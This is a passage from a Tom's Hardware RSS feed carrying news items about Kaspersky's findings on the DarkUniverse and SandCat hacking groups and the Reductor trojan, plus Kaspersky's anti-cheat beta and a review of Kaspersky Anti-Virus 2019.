                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/jjL6FLxHi3DTBMhvM9muDg-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 07 Nov 2019 18:33:17 +0000</pubDate>                                                                                                                                <updated>Tue, 28 Jan 2025 15:01:00 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/jjL6FLxHi3DTBMhvM9muDg-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/jjL6FLxHi3DTBMhvM9muDg-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure " data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:6000px;"><p class="vanilla-image-block" style="padding-top:66.73%;"><img id="" name="shutterstock_1050436496.jpg" alt="" src="https://cdn.mos.cms.futurecdn.net/jjL6FLxHi3DTBMhvM9muDg.jpg" mos="" align="middle" fullscreen="" width="6000" height="4004" attribution="" endorsement="" class=""></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>Antivirus company Kaspersky has uncovered an advanced persistent threat (APT) group that operated stealthily from at least 2009 until 2017. Kaspersky has named the newly discovered group <a href="https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/" target="_blank">DarkUniverse</a>. </p><p>The security vendor found the threat while investigating the <a href="https://www.tomshardware.com/news/microsoft-shadow-brokers-march-update,34157.html" target="_blank">“Shadow Brokers” data leak</a> from 2017. DarkUniverse spread its own malware by spear phishing with malicious <a href="https://www.tomshardware.com/reviews/get-microsoft-office-free-or-cheap,6348.html" target="_blank">Microsoft Office</a> documents. According to Kaspersky, each email was crafted specifically for its high-value target. </p><p>Kaspersky believes DarkUniverse is linked to ItaDuke, a threat group known since 2013, because much of the exploitation code used by the two overlaps. ItaDuke has primarily infected victims via spear phishing with malicious PDF files and has also used Twitter accounts to store command and control (C2) server URLs. </p><p>The DarkUniverse hackers seem to have been well funded, as their tools evolved significantly over the years. "Since the framework evolved from 2009 to 2017, the last releases are totally different from the first ones," Kaspersky said. </p><p>Kaspersky also noted that the DarkUniverse malware framework includes all the modules needed to collect every kind of information about the victims and their devices, and that it appears to have been developed from scratch. </p><p>According to Kaspersky, DarkUniverse apparently suspended operations when the Shadow Brokers&apos; data leak, which contained many NSA tools, went public in 2017. It&apos;s not clear whether that was a coincidence or whether the DarkUniverse group has ties to the NSA.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Malware Targets Chrome and Firefox To Sniff Encrypted Traffic ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/malware-chrome-firefox-sniff-encrypted-traffic-kaspersky,40586.html</link>
                                                                            <description>
                            <![CDATA[ Cybersecurity experts at Kaspersky identified a string of malware that affects encrypted communication by modifying Chrome and Firefox install files. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">6XmmhRfwKFkVwCgVshzPJN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/xRKCs9qPbkkSiwAWeT5dM7-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 08 Oct 2019 14:30:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:00 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Ash Hill ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/p9HsnLCwBpTQYCBBhYXgrS.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/xRKCs9qPbkkSiwAWeT5dM7-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/xRKCs9qPbkkSiwAWeT5dM7-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1510px;"><p class="vanilla-image-block" style="padding-top:64.24%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/xRKCs9qPbkkSiwAWeT5dM7.jpg" mos="https://cdn.mos.cms.futurecdn.net/xRKCs9qPbkkSiwAWeT5dM7.jpg" align="" fullscreen="1" width="1510" height="970" attribution="" endorsement="" class="pull- expandable"></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p>Cybersecurity researchers at Kaspersky have identified a strain of malware that undermines encrypted communication by modifying Chrome and Firefox installation files. They first discovered the malicious code in April 2019 and released an analysis of their findings this week.</p><p>The team at Kaspersky calls the new malware <a href="https://securelist.com/compfun-successor-reductor/93633/">Reductor</a>. It is a remote access trojan (RAT): once installed, it gives its operators remote control of the machine, so they can upload and download data or execute code on it from anywhere on the network.</p><p>The programmers behind Reductor went above and beyond with their creation; Kaspersky&apos;s official write-up even called it "impressive." Reductor patches the locally installed Chrome and Firefox files so that the browsers mark their outbound TLS traffic with a unique identifier. That fingerprint lets whoever can observe the traffic track the victim&apos;s connections even though the channel is encrypted.</p><p>"Analysis of the malware allowed us to confirm that the operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly," Kaspersky stated.</p><p>As of October, only targets in Russia and Belarus have been identified. The end goal of Reductor isn&apos;t clear yet. The team speculates that the TLS marking may be a form of redundancy, so the operators can keep tracking a victim even after the Reductor trojan itself is removed from the computer.</p><p>According to Kaspersky, the Kaspersky Attribution Engine showed significant similarities between Reductor and an earlier strain of malware known as COMPfun, <a href="https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence">first documented</a> in 2014. Because of these similarities, the team is confident that Reductor and COMPfun come from the same developers.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Easily Uncovers Uzbekistan Hacking Operations ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-sandcat-uzbekistan-hackers-spies-operations,40545.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky researchers easily uncovered hacking operations from Uzbekistan. The group, SandCat, is believed to be Uzbekistan's SSS intelligence agency. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">dCcqDxX3o2y8XwELkFEY8m</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 03 Oct 2019 18:26:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:02 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1500px;"><p class="vanilla-image-block" style="padding-top:73.80%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55.jpg" mos="https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55.jpg" align="" fullscreen="1" width="1500" height="1107" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/TB8TyZLgTitggN8ickN55.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure>
                                <p>Kaspersky security researchers were able to uncover hacking operations launched by what's believed to be an intelligence agency in Uzbekistan. According to the researchers, the Uzbekistan spies were easy to catch because of their incredibly bad operational security (opsec).</p>
                                <h2 id="a-sandcat-and-mouse-game">A SandCat and Mouse Game</h2>
                                <p>As reported by <a href="https://www.vice.com/amp/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec">Vice</a>, Kaspersky researchers recently found a hacking group that they believe is an intelligence agency from Uzbekistan. Kaspersky originally named the group “SandCat,” but it's now believed that SandCat is actually the Uzbekistan government's State Security Service (SSS).</p>
                                <p>One of the group's questionable opsec practices was using "the name of a military group with ties to the SSS" to register one of the domains in its attack infrastructure, according to Vice.</p>
                                <p>Another error SandCat made was installing <a href="https://www.tomshardware.com/reviews/kaspersky-anti-virus-2019-software-security,6274.html">Kaspersky Anti-Virus</a> on the same machines it used to write its new malware. This allowed Kaspersky's antivirus telemetry to detect and collect the malicious code before it was deployed. Kaspersky actually got into <a href="https://www.tomshardware.com/news/kaspersky-denies-allegations-russian-intelligence,34370.html">big trouble</a> over this feature not too long ago, when the U.S. government accused the vendor of stealing classified documents this way. But in this case, Kaspersky used its antivirus’ detection feature to learn about four new zero-day exploits that SandCat had purchased from third-party vulnerability brokers. Kaspersky was later able to uncover the activities of Saudi and United Arab Emirates (UAE) state hacking groups that had purchased the same tools.</p>
                                <h2 id="how-sandcat-developed-its-hacking-capabilities">How SandCat Developed Its Hacking Capabilities</h2>
                                <p>We know from an earlier breach of Hacking Team, an Italian company that sells hacking tools to governments and law enforcement, that the SSS was a customer in 2011. Hacking Team was one of the <a href="https://www.theguardian.com/technology/2015/jul/06/hacking-team-hacked-firm-sold-spying-tools-to-repressive-regimes-documents-claim">most infamous surveillance tool companies</a>, selling surveillance and hacking software to repressive governments. But the SSS’ cyber activities had flown under the radar until now.</p>
                                <p>Kaspersky had actually uncovered traces of SandCat activity as early as 2018, but at the time it had no reason to believe SandCat was the SSS. In 2018, SandCat was using a piece of malware called “Chainshot” that had also been used by the Saudi Arabian and UAE state groups. However, SandCat was using a different attack infrastructure from the other two, which led Kaspersky to believe it must be an unrelated hacking group. One thing the Kaspersky researchers did know at the time was that, whichever group it was, it had significant financial backing. They concluded this from the fact that the SandCat hackers were burning through their exploits (using them and then losing them to discovery by others) at a remarkable pace. However, burning the exploits so quickly meant that Saudi Arabia and the UAE couldn’t use them anymore either.</p>
                                <p>Kaspersky believes that for the latest attacks, SandCat purchased exploits from two Israeli companies, NSO Group and Candiru. NSO Group has been accused in the past of selling surveillance tools to governments that <a href="https://www.tomshardware.com/news/pegasus-ios-targets-activists-journalists,32563.html">target journalists and dissidents</a>, but the company has denied the allegations. Candiru provides a surveillance and hacking operations management platform as a service to interested hacking groups.</p>
                                <p>The companies may have stopped selling their tools to SandCat in 2018. That’s when Kaspersky believes the SandCat group may have started developing its own in-house tools. However, its poor opsec made it much easier for the group to get caught.</p>
                                <p>Kaspersky researchers believe that the recent discovery may force SandCat to improve its opsec, but at the same time it has also put the group in the spotlight. More security researchers are now expected to look for SandCat tools and perhaps identify more of its victims.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Starts Testing its eSports Cheater Detector ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-anti-cheat-esports-tool-beta-cloud,40372.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky released a beta version of its new Kaspersky Anti-Cheat service. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">GJTmW2Gi96zGjJ2Rvfam3H</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 10 Sep 2019 17:06:02 +0000</pubDate>                                                                                                                                <updated>Wed, 05 Feb 2025 14:30:48 +0000</updated>
                                                                                                                                            <category><![CDATA[Video Games]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1500px;"><p class="vanilla-image-block" style="padding-top:53.93%;"><img id="" name="" alt="Credit: Shutterstock" src="https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V.jpg" mos="https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V.jpg" align="" fullscreen="1" width="1500" height="809" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/oJmtCMscY2FhYwNPcNYS8V.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div><figcaption itemprop="caption description" class="pull-"><span class="credit" itemprop="copyrightHolder">(Image credit: Shutterstock)</span></figcaption></figure><p><a href="https://www.tomshardware.com/reviews/kaspersky-anti-virus-2019-software-security,6274.html">Kaspersky</a> is branching out from protecting PCs and businesses from cybersecurity threats and into protecting eSports players from unfairness. This week, it announced a beta version of Kaspersky Anti-Cheat, a tool specifically made for eSports organizations to ensure fair play.</p><p>It's not hard to guess why. Teams can win millions of dollars by playing in tournaments for popular titles like <em>Dota 2</em>, <em>League of Legends</em> and <em>Counter-Strike: Global Offensive</em>. Learning that someone managed to cheat during one of these tournaments--which has happened before--can lead to all sorts of problems for their organizers. (Should prizes be returned? Brackets changed?) When it comes to professional gaming, it's imperative the competition is fair.</p><p>The methods currently used to deter cheating vary from event to event. 
                                Blizzard carefully manages all of the equipment used for Overwatch League (a professional eSports league for <em>Overwatch</em> players) matches, for example, while Ubisoft's partners for <em>Rainbow Six Siege</em> rely on anti-cheat software because many matches are played online. Organizers can largely decide for themselves how they want to maintain a level playing field in a given eSports title.</p>
                                <p>According to Kaspersky, its cloud-based solution is installed on players' systems, after which "game process information is collected, sent to the Kaspersky Anti-Cheat cloud and analyzed for suspicious events." A referee then receives reports in real time through a web interface, leaving the ref and the organization to decide what action to take against the cheater.</p>
                                <p>Kaspersky partnered with <a href="https://starladder.com/en/">StarLadder</a>, which hosts tournaments for numerous titles, for a trial run of Kaspersky Anti-Cheat. StarLadder chief business development officer Alexander Chegrinez said in the announcement that it will "test this new solution at our tournaments to check how often players resort to dishonest behavior." Whether that leads to a longer partnership likely depends on the tool's utility.</p>
                                <p>Kaspersky Anti-Cheat has also been made available to game developers looking for a way to maintain integrity in non-eSports matches. The service has plenty of competition in that field, however, which could make it harder for Kaspersky's solution to gain traction.</p>
                                <p>More information about the service can be found on Kaspersky's <a href="https://go.kaspersky.com/anticheat.html">website</a>. Pricing information and other details aren't publicly available.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Anti-Virus 2019 Review: Lightweight, Simple, Reliable ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/reviews/kaspersky-anti-virus-2019-software-security,6274.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky is short on bonus features, but the core antivirus engine is a class leader, particularly with zero-day threats. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">cSDyH4VTbHMBbY4bNybA6G</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9SvGhxdMYL3JLj3siAVbDJ-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sat, 17 Aug 2019 01:00:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:02 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Jonas DeMuro ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/ugiZMTHAouonmwAuGxT6s.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/9SvGhxdMYL3JLj3siAVbDJ-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9SvGhxdMYL3JLj3siAVbDJ-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Kaspersky Lab, with over two decades of experience, is a household name in cybersecurity. Its current anti-malware suite, Kaspersky Anti-Virus 2019 brings plenty of features for keeping users safe while on the Internet.</p><p>The key to Kaspersky Anti-Virus is its intelligent behavioral model, which uses machine learning to identify malware through its behavior without the requirement of a prewritten virus signature. This suite assimilates nicely with <a href="https://www.tomshardware.com/reviews/get-windows-10-free-or-cheap,5717.html">Windows 10</a>, working harmoniously with the operating system’s (OS’) included security tools to provide additional protection against the full spectrum of malware threats. Recently added detection capabilities also shut down outgoing requests to malicious servers.</p><h2 id="price">Price</h2><p>Kaspersky Anti-Virus is priced to be competitive, starting at $29.99 (£23) for a 3 PC, 1-year license. You can lower the annual price per device by adding PCs and extending the subscription to up to three years.</p><div ><table><tbody><tr><td  ><strong>Number of Devices</strong></td><td  ><strong>1 Year</strong></td><td  ><strong>2 Years</strong></td><td  ><strong>3 Years</strong></td></tr><tr><td  ><strong>3</strong></td><td  >$29.99 ($10/device)</td><td  >$51.99 ($8.67/device annually)</td><td  >$66.98 ($7.44/device annually)</td></tr><tr><td  ><strong>5</strong></td><td  >$39.99 ($8/device)</td><td  >$68.99 ($6.90/device annually)</td><td  >$89.98 ($6/device annually)</td></tr></tbody></table></div><p>Kaspersky’s pricing scheme differs from competitors like ESET NOD32 or <a href="https://www.tomshardware.com/reviews/norton-antivirus-cyber-security-software,6220.html">Norton AntiVirus</a> with starting prices ($39.99) for protecting just 1 PC.</p><p>To protect PC, Mac and mobile device, Kaspersky offers two pricer options:</p><ul><li><strong>Kaspersky Internet Security:</strong> starts at $39.99 (3 
devices, 1 year)</li><li><strong>Kaspersky Total Security:</strong> starts at $49.99 (5 devices, 1 year, 2 user accounts)</li></ul><p>All Kaspersky consumer products offer a full 30-day trial. It is a 100% free download, and you can try it on your PC without entering payment information.</p><h2 id="setup-and-user-interface">Setup and User Interface</h2><p>The Kaspersky Anti-Virus installation process is easy, streamlined and quick. To start, sign up for a <a href="https://usa.kaspersky.com/downloads/thank-you/antivirus-free-trial">free trial via Kaspersky’s website</a>, where you’ll get a small download file. After accepting the license agreement, the installation package automatically downloads. We were able to complete installation without a license or putting in an email address. We did use the “Activate Trial License” link to complete setup.</p><p>However, there was an additional step. Kapersky’s dashboard next updated the signatures and program files. Most other antivirus software automatically does this quietly in the background during the installation. On the other hand, being able to manage the update will be an asset for some users.</p><p>Kaspersky Anti-Virus took up about 275MB of space on our <a href="https://www.tomshardware.com/news/cheap-ssds-are-killing-hard_drives,37563.html">hard drive</a>, with just two core processes, requiring a comparatively low 90MB <a href="https://www.tomshardware.com/reviews/best-ram,4057.html">RAM</a>, running in the background. 
It’s safe to say that this program is light on system resources.</p><figure role="gallery"><figure><img src="https://cdn.mos.cms.futurecdn.net/e2kJLns6QZsWCPeY2nm4Mj.png" alt="" /></figure><figure><img src="https://cdn.mos.cms.futurecdn.net/o8HVwJEASpvZwKY8VaXnm5.png" alt="" /></figure><figure><img src="https://cdn.mos.cms.futurecdn.net/CFMxetfcku6cgzpwJPGuBi.png" alt="" /></figure><figure><img src="https://cdn.mos.cms.futurecdn.net/UVyQWgNMWBNiWZdKgQdYxT.png" alt="" /></figure></figure><p>Kaspersky Anti-Virus uses a simple interface to disclose the current protection status through a clean visual display with green indicators. Four main buttons cover all the essential tasks: launching a scan, updating a database, viewing a report and accessing the on-screen keyboard.</p><h2 id="antivirus-scans">Antivirus Scans</h2><p>The Scan panel is used to initiate a quick or full system scan and can completely disinfect the entire storage drive or hone in on specific files and folders. The downside is that you have to do more navigation than is required of competitors. For example, three clicks are inputted into the console to set off a Quick Scan--not so quick, ultimately.</p><p>Our testing confirmed that this version of antivirus software is Kaspersky’s fastest to date. The Quick and Full scans both finished faster than the average for an antivirus suite when we benchmarked the software on our review system.</p><p>We appreciate the simple scheduler that runs various scan types on an automated basis, which specifies scans for a daily, weekly or monthly interval. 
The custom configuration option is useful for scheduling a scan on the next day when the system is powered off, which will have less impact on your PC’s performance, and to limit scans to a locked or sleeping computer.</p><p>Kaspersky Anti-Virus has choices for finely tuning each scan type, down to the details of the zone to be scrubbed, the type of file to be examined, a selection of the detection engine and the plan for detected threats (disinfecting the file, deleting it, or asking what’s next). The options are aplenty. You can speed up Quick Scans by configuring Kaspersky to skip old files, only sanitize new and modified files. Or maybe you only want to use Full System Scans to scrub specific network folders. Just remember that granular control does have its compromises, as speeding up scans can reduce your level of malware protection.</p><p>The Vulnerability Scan gives an assessment of how secure your system is, looking for expired security patches, vulnerable Windows settings and more. When we ran the scan on our test PC, we were informed that autorun for removable drives is enabled by default and were able to address it with a few clicks. This was a helpful alert, considering that having this feature enabled makes the system vulnerable to USB key-based malware.</p><p>Even with all the different scan types, we still yearn for the ability to implement true custom scan types. The option to create an 'Ultra Quick Scan' with just a few clicks would be welcome and also retain the option for the original Quick Scan. Major competitors, including Avast and Avira, offer these options to appease their expert users, who many find Kaspersky’s limitation of existing scan types only too, well, limiting.</p><h2 id="antivirus-testing-and-performance">Antivirus Testing and Performance</h2><p>We pit Kaspersky Anti-Virus against our homebrew ransomware simulator. 
Although it is fairly simple, there is no chance of it being a known threat to Kaspersky, which means the software would need to identify it from its behavior, not from virus signatures.</p><p>Our ransomware got running, and the Kaspersky System Watcher module monitored the simulated ransomware’s behavior. First, there was a quick notification that this ransomware indeed was a threat, before the software neutralized the process. Next, the antivirus deleted the ransomware file from the PC. The ransomware did manage to encrypt a handful of document files before Kaspersky could neutralize it. But this turned out to be no problem, as Kaspersky Anti-Virus easily decrypted and restored the original files, so nothing was lost. An impressive performance, this validates that Kaspersky safeguards against even yet-to-be-discovered threats with ease.</p><p>An antivirus program has to make sure that it is safe from malware in general, so we put it through some simple tests that attempted a modification or deletion of the Kaspersky files. After this testing, we can conclude that this package can certainly protect itself, with none of our attacks causing any harm to the antivirus program.</p><h2 id="other-security-features">Other Security Features</h2><p>Kaspersky Anti-Virus’ most critical element is the core antivirus engine, which blocks malware prior to it threatening your PC. But there’s also the System Watcher, which uses behavior monitoring technology to find undiscovered threats. It has multiple protection layers, which work on a full array of threats, from network attacks, to malicious email objects and phishing attacks.</p><p>Kaspersky Anti-Virus also has anti-adware capability. Plus, there’s Kaspersky Secure Connection, a rather rudimentary VPN (from the folks at <a href="https://www.tomshardware.com/reviews/hotspot-shield-vpn-service,6237.html">Hotspot Shield</a>). 
Sure, we can find a use for a VPN that doesn’t require registration, but its low 200BMB daily data allotment makes  it less than useful for daily usage. The option to upgrade it to unlimited traffic for $4.99 (£3.80) monthly isn’t a huge bargain, since there are a lot of other VPNs (particularly with long-term subscriptions) available for that price or less.</p><p>Kaspersky Anti-Virus has a few more tricks up its sleeve. For example, there is the simple on-screen keyboard for entering protected logins of user credentials, account numbers and other private details that demand higher security. We ran it against a number of commercial keylogger software solutions and happily report that none captured our keystrokes.</p><p>The Windows Troubleshooting Wizard allows you to search your Windows OS for any damage from malware or revert changes applied to earlier issues. While potentially useful, we don’t know the true breadth of issues examined. With our review PC, the Windows Troubleshooting Wizard did not encounter any new issues, (except for the aforementioned autorun that we already knew about).</p><p>Another overpromise is the Browser Configuration Wizard, as this module confines itself to configuring a single browser, Microsoft Edge, not even the browser of choice for many users. At least this browser engine gets utilized by some other applications, so even for alternative browser aficionados, addressing these Edge issues can help secure their system.</p><p>The Privacy Cleaner searches for and deletes Windows and activity records from your browsing history, along with cookie lists of Recent Documents, recently run programs, recent folders used and more. While nothing is seriously wrong with this feature, like others in this suite, it’s simply not exceptional, and there is no shortage of dedicated freeware software available that is just as functional.</p><p>Another marginal bonus element is Kaspersky Rescue Disk. 
This bootable environment detects and deletes deeply embedded threats, which can corrupt Windows and prevent <a href="https://www.tomshardware.com/reviews/fastest-windows-10-boot-time,5810.html">booting</a>. While a welcome useful feature, experts will note that this feature is entirely <a href="https://usa.kaspersky.com/downloads/thank-you/free-rescue-disk">free for all to download from the Kaspersky website</a>; Kaspersky Anti-Virus is merely providing the download link.</p><p>Overall, Kaspersky is weak when it comes to bonus features and lags the competition. By way of comparison, Avast Free Antivirus includes a Wi-Fi Inspector that locates wireless vulnerabilities, weak passwords and needed software patches, and Bitdefender Antivirus Plus has a password manager, online banking protection and bootable rescue mode. Most users do not choose an antivirus program based upon bonus elements, but that being said, we would encourage Kaspersky to include additional features in a future edition.</p><h2 id="bottom-line">Bottom Line</h2><p>Kaspersky Anti-Virus 2019 may be missing the full set of bonus features of its competition, but this you may be able to overlook this for a software that excels at accurate anti-malware protection.</p><p>Power users will lament the lack of a customizable scan. 
If that’s important to you, you may want to consider other antivirus solutions, like ESET NOD32 or <a href="https://www.tomshardware.com/reviews/norton-antivirus-cyber-security-software,6220.html">Norton AntiVirus</a>.</p><p>But with its reliable ransomware and general malware protection, coverage of 3 PCs for less than what others charge to protect one PC and a free trial that doesn’t require entering your contact info, Kaspersky Anti-Virus is a safe bet.</p><p><em>Image Credits: Kaspersky</em></p><p><br/><strong>MORE: <a href="https://www.tomshardware.com/topics/security/reviews">All Security Reviews</a></strong></p><p><br/><strong>MORE: <a href="https://www.tomshardware.com/topics/security">All Security Content</a></strong></p><iframe src="https://content.jwplatform.com/players/LqlBSXUN.html" id="LqlBSXUN" title="Buy the Right Desktop PC" width="1920" height="1080" frameborder="0" scrolling="auto" allowfullscreen></iframe>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Report: Kaspersky Identifies Web Users Through UUID Injection ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-injects-uuid-web-pages,40169.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky injected a Universally Unique Identifier (UUID) into the HTML source of all web pages without user consent. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">MTJMWFxqcMfH5R5PyYTZPT</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 15 Aug 2019 17:24:02 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/hEFeUwJHtzVDWEZTcjDqt9.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG-1280-80.jpg">
                                                            <media:credit><![CDATA[Sharaf Maksumov / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/KEnfyeai4qh55HsSh3GQAG-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
